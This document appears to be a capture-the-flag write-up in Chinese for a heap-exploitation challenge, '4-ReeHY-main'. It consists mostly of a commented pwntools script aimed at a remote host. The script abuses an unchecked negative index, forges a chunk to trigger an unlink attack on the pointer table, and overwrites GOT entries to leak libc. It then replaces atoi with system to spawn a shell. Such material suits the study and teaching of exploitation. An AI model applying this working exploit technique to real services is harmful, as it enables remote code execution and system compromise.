程序分析
0x620c0 是存放堆大小的地方，edit 根据这个值来进行修改
0x6020e0存放堆地址的地方,可以利用unlink
而delete没有进行数字的检查,所以进行unlink时,没有修改unsorted bin的能力,于是可以输入负数到0x6020c0修改size
拿到edit(0x200)的权限
#coding:utf8
from pwn import *
from LibcSearcher import *
# Verbose pwntools logging: every byte sent and received is echoed, which is
# what you want while debugging a menu-driven interaction.
context.log_level = 'debug'
# Local run of the challenge binary, kept for reference:
#p = process('./4-ReeHY-main')
# Remote endpoint the rest of the script talks to (host, port as given).
REMOTE_HOST, REMOTE_PORT = '111.200.241.244', '62769'
p = remote(REMOTE_HOST, REMOTE_PORT)
# The binary/libc handles are opened later in the script instead:
#elf = ELF('./4-ReeHY-main')
#lib = ELF('./4main.so.6')
def alloc(size, index, content):
    """Drive menu option 1 (allocate): send size, slot index, then the content.

    size and index are sent as decimal text after their prompts; content is
    delivered with sendafter (no newline appended), so the caller controls
    the exact bytes that land in the new chunk.
    """
    menu_steps = (
        ('$', '1'),
        ('Input size\n', str(size)),
        ('Input cun\n', str(index)),
    )
    for prompt, answer in menu_steps:
        p.sendlineafter(prompt, answer)
    p.sendafter('Input content\n', content)
def delete(index):
    """Drive menu option 2 (delete) for the given slot index.

    The index is forwarded verbatim via str(index); no client-side range
    check is done, which the script later relies on (delete(-2)).  Whether
    the service validates it is decided remotely, not here.
    """
    choice, slot = '2', str(index)
    p.sendlineafter('$', choice)
    p.sendlineafter('Chose one to dele\n', slot)
def edit(index, content):
    """Drive menu option 3 (edit): rewrite the content of the given slot.

    content goes out with sendafter (raw bytes, no newline appended), so
    packed payloads are delivered exactly as built.  How many bytes the
    service accepts for a slot is decided server-side (the write-up ties it
    to the size table), not by this helper.
    """
    for prompt, answer in (('$', '3'), ('Chose one to edit\n', str(index))):
        p.sendlineafter(prompt, answer)
    p.sendafter('Input the content\n', content)
# Address of the chunk-pointer table (the write-up above: 0x6020e0 holds the
# heap pointers); the unlink below is aimed at it.
target = 0x6020e0
# First prompt is a name/login; the value is arbitrary.
p.sendlineafter('$','nidie')
# Two 0x100-byte chunks in slots 0 and 1; slot 1 is the one freed later.
alloc(0x100,0,'aaaa')
alloc(0x100,1,'bbbb')
# Negative index passed straight through (the write-up says the binary does not
# check it).  Together with the next alloc this ends up with p32(0x200)+p32(0x100)
# over the size table at 0x6020c0, so slot 0 is later accepted for a 0x200-byte
# edit.  The exact mechanics are not visible here -- confirm against the binary.
delete(-2)
alloc(0x14,2,p32(0x200)+p32(0x100))#we can make heap overflow
#gdb.attach(p)
#pause()
# Fake chunk at the start of chunk 0: prev_size=0, size=0x101, then
# fd=target-0x18 and bk=target-0x10.  fd+0x18 and bk+0x10 both point at the
# table slot holding chunk 0's pointer, which is what unlink's sanity check
# compares against.
payload = p64(0)+p64(0x101)
payload += p64(target-0x18)+p64(target-0x10)
# Pad to offset 0x100 (0x20 written above + 0xe0 filler), i.e. up to chunk 1's header.
payload += 'a'*(0x100-2*0x10)
# Chunk 1's header: prev_size=0x100 and size=0x110 (low bit clear, so the
# previous chunk is marked free); freeing chunk 1 then consolidates backward
# into the fake chunk and unlinks it.
payload += p64(0x100)+p64(0x110)
edit(0,payload)
#gdb.attach(p)
#pause()
# Trigger the unlink; afterwards slot 0 points at target-0x18 (0x6020c8).
delete(1)
# The binary is only needed for its GOT/PLT addresses (non-PIE assumed).
elf = ELF('./4-ReeHY-main')
free_got = elf.got['free']
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']
# edit(0) now writes at 0x6020c8: 0x18 bytes of padding reach 0x6020e0, then
# the table is rewritten as (pointer, 1) pairs: slot0=free@got, slot1=puts@got,
# slot2=atoi@got.  The trailing 1 presumably marks the slot in use -- confirm
# against the binary.
payload = '\x00'*0x18
payload += p64(free_got)+p64(1)
payload += p64(puts_got)+p64(1)
payload += p64(atoi_got)+p64(1)
edit(0,payload)
# Overwrite free@got with puts@plt, so free(x) prints the bytes at x.
edit(0,p64(puts_plt))
# delete(1) == free(puts@got) == puts(puts@got): leaks puts' libc address.
delete(1)
# The leak is 6 little-endian bytes; pad to 8 before unpacking.
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(puts_addr)
#base = puts_addr-lib.symbols['puts']
#sys_addr = base + lib.symbols['system']
# Resolve the remote libc from the single leak; dump() gives symbol offsets.
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
# Slot 2 points at atoi@got, so this overwrites atoi with system; the menu
# presumably parses the next choice with atoi, which then runs the string.
edit(2,p64(sys_addr))
p.sendlineafter('$','/bin/sh\x00')
p.interactive()